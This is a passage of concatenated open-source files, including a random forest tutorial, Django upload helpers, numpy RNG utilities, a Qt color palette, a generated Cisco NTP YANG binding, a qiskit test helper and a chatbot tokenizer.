return self._action_descs.get(action_name)
def find_all(self, namespace=None, limit=None, sort_fields=None,
sort_dirs=None, **filters):
# TODO(rakhmerov): Apply sort_keys, sort_dirs, and filters.
return self._action_descs.values()
|
02_Python/Random_Forest_Classifier.py | milaan9/Clustering_Algorithms_from_Scratch | 126 | 12663913 | <filename>02_Python/Random_Forest_Classifier.py
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
RSEED = 50
# Load in data
df = pd.read_csv('https://s3.amazonaws.com/projects-rf/clean_data.csv')
# Full dataset: https://www.kaggle.com/cdc/behavioral-risk-factor-surveillance-system
# Extract the labels
labels = np.array(df.pop('label'))
# 30% examples in test data
train, test, train_labels, test_labels = train_test_split(df,
labels,
stratify = labels,
test_size = 0.3,
random_state = RSEED)
# Imputation of missing values
train = train.fillna(train.mean())
test = test.fillna(test.mean())
# Features for feature importances
features = list(train.columns)
# Create the model with 100 trees
model = RandomForestClassifier(n_estimators=100,
random_state=RSEED,
max_features = 'sqrt',
n_jobs=-1, verbose = 1)
# Fit on training data
model.fit(train, train_labels)
n_nodes = []
max_depths = []
# Stats about the trees in random forest
for ind_tree in model.estimators_:
n_nodes.append(ind_tree.tree_.node_count)
max_depths.append(ind_tree.tree_.max_depth)
print(f'Average number of nodes {int(np.mean(n_nodes))}')
print(f'Average maximum depth {int(np.mean(max_depths))}')
# Training predictions (to demonstrate overfitting)
train_rf_predictions = model.predict(train)
train_rf_probs = model.predict_proba(train)[:, 1]
# Testing predictions (to determine performance)
rf_predictions = model.predict(test)
rf_probs = model.predict_proba(test)[:, 1]
from sklearn.metrics import precision_score, recall_score, roc_auc_score, roc_curve
import matplotlib.pyplot as plt
# Plot formatting
plt.style.use('fivethirtyeight')
plt.rcParams['font.size'] = 18
def evaluate_model(predictions, probs, train_predictions, train_probs):
"""Compare machine learning model to baseline performance.
Computes statistics and shows ROC curve."""
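    # The baseline always predicts the positive class, which fixes its recall at 1.0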
baseline = {}
baseline['recall'] = recall_score(test_labels,
[1 for _ in range(len(test_labels))])
baseline['precision'] = precision_score(test_labels,
[1 for _ in range(len(test_labels))])
baseline['roc'] = 0.5
results = {}
results['recall'] = recall_score(test_labels, predictions)
results['precision'] = precision_score(test_labels, predictions)
results['roc'] = roc_auc_score(test_labels, probs)
train_results = {}
train_results['recall'] = recall_score(train_labels, train_predictions)
train_results['precision'] = precision_score(train_labels, train_predictions)
train_results['roc'] = roc_auc_score(train_labels, train_probs)
for metric in ['recall', 'precision', 'roc']:
print(f'{metric.capitalize()} Baseline: {round(baseline[metric], 2)} Test: {round(results[metric], 2)} Train: {round(train_results[metric], 2)}')
# Calculate false positive rates and true positive rates
base_fpr, base_tpr, _ = roc_curve(test_labels, [1 for _ in range(len(test_labels))])
model_fpr, model_tpr, _ = roc_curve(test_labels, probs)
plt.figure(figsize = (8, 6))
plt.rcParams['font.size'] = 16
# Plot both curves
plt.plot(base_fpr, base_tpr, 'b', label = 'baseline')
plt.plot(model_fpr, model_tpr, 'r', label = 'model')
plt.legend();
plt.xlabel('False Positive Rate');
plt.ylabel('True Positive Rate'); plt.title('ROC Curves');
plt.show();
evaluate_model(rf_predictions, rf_probs, train_rf_predictions, train_rf_probs)
plt.savefig('roc_auc_curve.png')
from sklearn.metrics import confusion_matrix
import itertools
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Oranges):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
Source: http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
# Plot the confusion matrix
plt.figure(figsize = (10, 10))
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title, size = 24)
plt.colorbar(aspect=4)
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45, size = 14)
plt.yticks(tick_marks, classes, size = 14)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
# Labeling the plot
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt), fontsize = 20,
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.grid(None)
plt.tight_layout()
plt.ylabel('True label', size = 18)
plt.xlabel('Predicted label', size = 18)
# Confusion matrix
cm = confusion_matrix(test_labels, rf_predictions)
plot_confusion_matrix(cm, classes = ['Poor Health', 'Good Health'],
title = 'Health Confusion Matrix')
plt.savefig('cm.png')
|
leonardo/module/media/utils.py | timgates42/django-leonardo | 102 | 12663918 | <gh_stars>100-1000
from .models import Folder, MEDIA_MODELS
def handle_uploaded_file(file, folder=None, is_public=True):
    '''handle an uploaded file into a folder
    matches the first media type, creates a media object and returns it
    file: File object
    folder: str or Folder instance
is_public: boolean
'''
_folder = None
if folder and isinstance(folder, Folder):
_folder = folder
elif folder:
_folder, folder_created = Folder.objects.get_or_create(
name=folder)
for cls in MEDIA_MODELS:
if cls.matches_file_type(file.name):
obj, created = cls.objects.get_or_create(
original_filename=file.name,
file=file,
folder=_folder,
is_public=is_public)
if created:
return obj
return None
def handle_uploaded_files(files, folder=None, is_public=True):
'''handle uploaded files to folder
files: array of File objects or single object
    folder: str or Folder instance
is_public: boolean
'''
results = []
for f in files:
result = handle_uploaded_file(f, folder, is_public)
results.append(result)
return results
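# Usage sketch (hypothetical values): given an uploaded Django File object `f`,
# handle_uploaded_file(f, folder='reports', is_public=False) creates the folder if needed
# and returns the first matching media object, or None when no media type matches.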
|
cardio/dataset/dataset/utils_random.py | lbdvriesGT/cardio | 101 | 12663965 | <gh_stars>100-1000
""" contains data utils """
import warnings
import numpy as np
def make_rng(seed=None):
""" Create a random number generator
Parameters
----------
    seed : bool, int, SeedSequence, Generator, BitGenerator, RandomState
a random state
- False - returns None
- None or True - creates a new SFC64 generator with random entropy
- int - creates a new SFC64 generator with the seed given
- SeedSequence - creates a new SFC64 generator with the seed given
- Generator - returns it
- BitGenerator - creates a new generator
- RandomState - returns it
Notes
-----
    Do not use a legacy RandomState except for backward compatibility.
Returns
-------
numpy.random.Generator
"""
if seed is False:
rng = None
elif seed is None or seed is True:
rng = np.random.default_rng(np.random.SFC64())
elif isinstance(seed, np.random.SeedSequence):
rng = np.random.default_rng(np.random.SFC64(seed))
elif isinstance(seed, int):
rng = np.random.default_rng(np.random.SFC64(seed))
elif isinstance(seed, np.random.Generator):
rng = seed
elif isinstance(seed, np.random.BitGenerator):
rng = np.random.default_rng(seed)
elif isinstance(seed, np.random.RandomState):
rng = seed
else:
warnings.warn("Unknown seed type: %s" % seed)
rng = None
return rng
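# Usage sketch for make_rng (illustrative values): make_rng(42) returns a reproducible
# SFC64-backed Generator, make_rng(False) returns None, and make_rng(True) draws fresh entropy.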
def make_seed_sequence(shuffle=False):
""" Create a seed sequence for random number generation
Parameters
----------
shuffle : bool or int or object with a seed sequence attribute
a random state
- False or True - creates a new seed sequence with random entropy
- int - creates a new seed sequence with the given entropy
Returns
-------
numpy.random.SeedSequence
"""
if isinstance(getattr(shuffle, 'random_seed', None), np.random.SeedSequence):
return shuffle.random_seed
if shuffle is None or isinstance(shuffle, bool):
seed = np.random.SeedSequence()
elif isinstance(shuffle, int):
if shuffle >= 0:
seed = np.random.SeedSequence(shuffle)
else:
# if shuffle is negative, do not shuffle the dataset, but use the seed for randomization
seed = np.random.SeedSequence(-shuffle)
else:
raise TypeError('shuffle can be bool or int', shuffle)
return seed
def spawn_seed_sequence(source):
""" Return a new seed sequence or None
Parameters
----------
source : numpy.random.SeedSequence or Batch or Pipeline
Returns
-------
numpy.random.SeedSequence
"""
if isinstance(source, np.random.SeedSequence):
pass
elif isinstance(getattr(source, 'random_seed', None), np.random.SeedSequence):
source = source.random_seed
else:
raise ValueError('source should be SeedSequence, Batch or Pipeline, but given %s' % type(source))
return source.spawn(1)[0]
|
external-deps/qdarkstyle/qdarkstyle/colorsystem.py | Earthman100/spyder | 7,956 | 12663992 | # colorsystem.py is the full list of colors that can be used to easily create themes.
class Gray:
B0 = '#000000'
B10 = '#19232D'
B20 = '#293544'
B30 = '#37414F'
B40 = '#455364'
B50 = '#54687A'
B60 = '#60798B'
B70 = '#788D9C'
B80 = '#9DA9B5'
B90 = '#ACB1B6'
B100 = '#B9BDC1'
B110 = '#C9CDD0'
B120 = '#CED1D4'
B130 = '#E0E1E3'
B140 = '#FAFAFA'
B150 = '#FFFFFF'
class Blue:
B0 = '#000000'
B10 = '#062647'
B20 = '#26486B'
B30 = '#375A7F'
B40 = '#346792'
B50 = '#1A72BB'
B60 = '#057DCE'
B70 = '#259AE9'
B80 = '#37AEFE'
B90 = '#73C7FF'
B100 = '#9FCBFF'
B110 = '#C2DFFA'
B120 = '#CEE8FF'
B130 = '#DAEDFF'
B140 = '#F5FAFF'
    B150 = '#FFFFFF'
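# Example (illustrative only): a theme could map palette roles onto these constants,
# e.g. BACKGROUND = Gray.B10 and ACCENT = Blue.B70.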
|
cisco-ios-xr/ydk/models/cisco_ios_xr/ntp.py | CiscoDevNet/ydk-py | 177 | 12664007 | <gh_stars>100-1000
""" ntp
This module contains definitions
for the Calvados model objects.
This module contains a collection of YANG definitions
for Cisco IOS\-XR syadmin NTP configuration.
This module contains definitions
for the following management objects\:
NTP configuration data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
Copyright (c) 2012\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ntp(_Entity_):
"""
.. attribute:: peer
**type**\: list of :py:class:`Peer <ydk.models.cisco_ios_xr.ntp.Ntp.Peer>`
.. attribute:: server
**type**\: list of :py:class:`Server <ydk.models.cisco_ios_xr.ntp.Ntp.Server>`
.. attribute:: trusted_key
**type**\: list of int
**range:** 1..65534
.. attribute:: authenticate
**type**\: :py:class:`Empty<ydk.types.Empty>`
.. attribute:: authentication_key
**type**\: list of :py:class:`AuthenticationKey <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey>`
.. attribute:: trace
**type**\: :py:class:`Trace <ydk.models.cisco_ios_xr.ntp.Ntp.Trace>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp, self).__init__()
self._top_entity = None
self.yang_name = "ntp"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("peer", ("peer", Ntp.Peer)), ("server", ("server", Ntp.Server)), ("authentication-key", ("authentication_key", Ntp.AuthenticationKey)), ("trace", ("trace", Ntp.Trace))])
self._leafs = OrderedDict([
('trusted_key', (YLeafList(YType.int32, 'trusted-key'), ['int'])),
('authenticate', (YLeaf(YType.empty, 'authenticate'), ['Empty'])),
])
self.trusted_key = []
self.authenticate = None
self.trace = Ntp.Trace()
self.trace.parent = self
self._children_name_map["trace"] = "trace"
self.peer = YList(self)
self.server = YList(self)
self.authentication_key = YList(self)
self._segment_path = lambda: "ntp:ntp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp, ['trusted_key', 'authenticate'], name, value)
class Peer(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Peer, self).__init__()
self.yang_name = "peer"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "peer" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Peer, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Peer']['meta_info']
class Server(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Server, self).__init__()
self.yang_name = "server"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "server" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Server, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Server']['meta_info']
class AuthenticationKey(_Entity_):
"""
.. attribute:: key_number (key)
**type**\: int
**range:** 1..65534
.. attribute:: md5_keyword
**type**\: :py:class:`Md5Keyword <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Md5Keyword>`
**mandatory**\: True
.. attribute:: encryption
**type**\: :py:class:`Encryption <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Encryption>`
.. attribute:: keyname
**type**\: str
**length:** 0..32
**mandatory**\: True
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.AuthenticationKey, self).__init__()
self.yang_name = "authentication-key"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['key_number']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_number', (YLeaf(YType.int32, 'key-number'), ['int'])),
('md5_keyword', (YLeaf(YType.enumeration, 'md5-keyword'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Md5Keyword')])),
('encryption', (YLeaf(YType.enumeration, 'encryption'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Encryption')])),
('keyname', (YLeaf(YType.str, 'keyname'), ['str'])),
])
self.key_number = None
self.md5_keyword = None
self.encryption = None
self.keyname = None
self._segment_path = lambda: "authentication-key" + "[key-number='" + str(self.key_number) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.AuthenticationKey, ['key_number', 'md5_keyword', 'encryption', 'keyname'], name, value)
class Encryption(Enum):
"""
Encryption (Enum Class)
.. data:: clear = 0
.. data:: encrypted = 1
"""
clear = Enum.YLeaf(0, "clear")
encrypted = Enum.YLeaf(1, "encrypted")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Encryption']
class Md5Keyword(Enum):
"""
Md5Keyword (Enum Class)
.. data:: md5 = 0
"""
md5 = Enum.YLeaf(0, "md5")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Md5Keyword']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey']['meta_info']
class Trace(_Entity_):
"""
.. attribute:: ntp_helper
**type**\: :py:class:`NtpHelper <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ntp_helper", ("ntp_helper", Ntp.Trace.NtpHelper))])
self._leafs = OrderedDict()
self.ntp_helper = Ntp.Trace.NtpHelper()
self.ntp_helper.parent = self
self._children_name_map["ntp_helper"] = "ntp_helper"
self._segment_path = lambda: "trace"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace, [], name, value)
class NtpHelper(_Entity_):
"""
.. attribute:: trace
show traceable processes
**type**\: list of :py:class:`Trace_ <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper, self).__init__()
self.yang_name = "ntp_helper"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("trace", ("trace", Ntp.Trace.NtpHelper.Trace_))])
self._leafs = OrderedDict()
self.trace = YList(self)
self._segment_path = lambda: "ntp_helper"
self._absolute_path = lambda: "ntp:ntp/trace/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper, [], name, value)
class Trace_(_Entity_):
"""
show traceable processes
.. attribute:: buffer (key)
**type**\: str
**config**\: False
.. attribute:: location
**type**\: list of :py:class:`Location <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp_helper"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['buffer']
self._child_classes = OrderedDict([("location", ("location", Ntp.Trace.NtpHelper.Trace_.Location))])
self._leafs = OrderedDict([
('buffer', (YLeaf(YType.str, 'buffer'), ['str'])),
])
self.buffer = None
self.location = YList(self)
self._segment_path = lambda: "trace" + "[buffer='" + str(self.buffer) + "']"
self._absolute_path = lambda: "ntp:ntp/trace/ntp_helper/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_, ['buffer'], name, value)
class Location(_Entity_):
"""
.. attribute:: location_name (key)
**type**\: str
**config**\: False
.. attribute:: all_options
**type**\: list of :py:class:`AllOptions <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location, self).__init__()
self.yang_name = "location"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['location_name']
self._child_classes = OrderedDict([("all-options", ("all_options", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions))])
self._leafs = OrderedDict([
('location_name', (YLeaf(YType.str, 'location_name'), ['str'])),
])
self.location_name = None
self.all_options = YList(self)
self._segment_path = lambda: "location" + "[location_name='" + str(self.location_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location, ['location_name'], name, value)
class AllOptions(_Entity_):
"""
.. attribute:: option (key)
**type**\: str
**config**\: False
.. attribute:: trace_blocks
**type**\: list of :py:class:`TraceBlocks <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, self).__init__()
self.yang_name = "all-options"
self.yang_parent_name = "location"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['option']
self._child_classes = OrderedDict([("trace-blocks", ("trace_blocks", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks))])
self._leafs = OrderedDict([
('option', (YLeaf(YType.str, 'option'), ['str'])),
])
self.option = None
self.trace_blocks = YList(self)
self._segment_path = lambda: "all-options" + "[option='" + str(self.option) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, ['option'], name, value)
class TraceBlocks(_Entity_):
"""
.. attribute:: data
Trace output block
**type**\: str
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, self).__init__()
self.yang_name = "trace-blocks"
self.yang_parent_name = "all-options"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('data', (YLeaf(YType.str, 'data'), ['str'])),
])
self.data = None
self._segment_path = lambda: "trace-blocks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, ['data'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace']['meta_info']
def clone_ptr(self):
self._top_entity = Ntp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp']['meta_info']
class ClockAction(_Entity_):
"""
.. attribute:: clock
**type**\: :py:class:`Clock <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction, self).__init__()
self._top_entity = None
self.yang_name = "clock-action"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("clock", ("clock", ClockAction.Clock))])
self._leafs = OrderedDict()
self.clock = ClockAction.Clock()
self.clock.parent = self
self._children_name_map["clock"] = "clock"
self._segment_path = lambda: "ntp:clock-action"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction, [], name, value)
class Clock(_Entity_):
"""
.. attribute:: action
**type**\: :py:class:`Action <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock.Action>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock, self).__init__()
self.yang_name = "clock"
self.yang_parent_name = "clock-action"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("Action", ("action", ClockAction.Clock.Action))])
self._leafs = OrderedDict()
self.action = ClockAction.Clock.Action()
self.action.parent = self
self._children_name_map["action"] = "Action"
self._segment_path = lambda: "clock"
self._absolute_path = lambda: "ntp:clock-action/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction.Clock, [], name, value)
class Action(_Entity_):
"""
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock.Action, self).__init__()
self.yang_name = "Action"
self.yang_parent_name = "clock"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self._segment_path = lambda: "Action"
self._absolute_path = lambda: "ntp:clock-action/clock/%s" % self._segment_path()
self._is_frozen = True
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock.Action']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock']['meta_info']
def clone_ptr(self):
self._top_entity = ClockAction()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction']['meta_info']
|
test/circuit/library/ansatzes/utils/vibrational_op_label_creator.py | jschuhmac/qiskit-nature | 132 | 12664035 | <gh_stars>100-1000
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Some utility methods which were removed but are still required for some unit-tests."""
from typing import List, Tuple
def _create_labels(
boson_hamilt_harm_basis: List[List[Tuple[List[List[int]], complex]]]
) -> List[Tuple[str, complex]]:
all_labels = []
for num_body_data in boson_hamilt_harm_basis:
num_body_labels = _create_num_body_labels(num_body_data)
all_labels.extend(num_body_labels)
return all_labels
def _create_num_body_labels(
num_body_data: List[Tuple[List[List[int]], complex]]
) -> List[Tuple[str, complex]]:
num_body_labels = []
for indices, coeff in num_body_data:
indices.sort()
coeff_label = _create_label_for_coeff(indices)
num_body_labels.append((coeff_label, coeff))
return num_body_labels
def _create_label_for_coeff(indices: List[List[int]]) -> str:
complete_labels_list = []
for mode, modal_raise, modal_lower in indices:
if modal_raise <= modal_lower:
complete_labels_list.append(f"+_{mode}*{modal_raise}")
complete_labels_list.append(f"-_{mode}*{modal_lower}")
else:
complete_labels_list.append(f"-_{mode}*{modal_lower}")
complete_labels_list.append(f"+_{mode}*{modal_raise}")
complete_label = " ".join(complete_labels_list)
return complete_label
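if __name__ == "__main__":
    # Minimal usage sketch (not part of the original utilities, illustrative values
    # only): a single one-body term on mode 0 that lowers modal 0 and raises modal 1.
    example = [[([[0, 1, 0]], 0.5)]]
    print(_create_labels(example))  # [('-_0*0 +_0*1', 0.5)]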
|
rnn/chatbot/seq2seq_conversation_model/tokenizer.py | llichengtong/yx4 | 128 | 12664047 | # coding=utf8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import re
import sys
from tensorflow.python.platform import gfile
from settings import VOCAB_DICT_FILE
_PAD = "_PAD"
_GO = "_GO"
_EOS = "_EOS"
_UNK = "_UNK"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile("([.,!?\"':;)(])")
_DIGIT_RE = re.compile(r"\d")
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(re.split(_WORD_SPLIT, space_separated_fragment))
return [w.decode('utf8') for w in words if w]
# forward maximum matching word segmentation
_DICT = None
_MAX_WORD_LENGTH = 0
def fmm_tokenizer(sentence):
global _DICT
global _MAX_WORD_LENGTH
if not _DICT:
_DICT, _ = initialize_vocabulary(VOCAB_DICT_FILE)
for v in _DICT:
if len(v) > _MAX_WORD_LENGTH:
_MAX_WORD_LENGTH = len(v)
print(_MAX_WORD_LENGTH)
words = []
begin = 0
while begin < len(sentence):
end = min(begin + _MAX_WORD_LENGTH, len(sentence))
while end > begin + 1:
word = sentence[begin: end]
# print (word)
if word in _DICT:
break
end -= 1
word = sentence[begin: end]
words.append(word.encode('utf8'))
begin = end
return words
def create_vocabulary(vocabulary_path, data_path_patterns, max_vocabulary_size,
tokenizer=None, normalize_digits=True):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
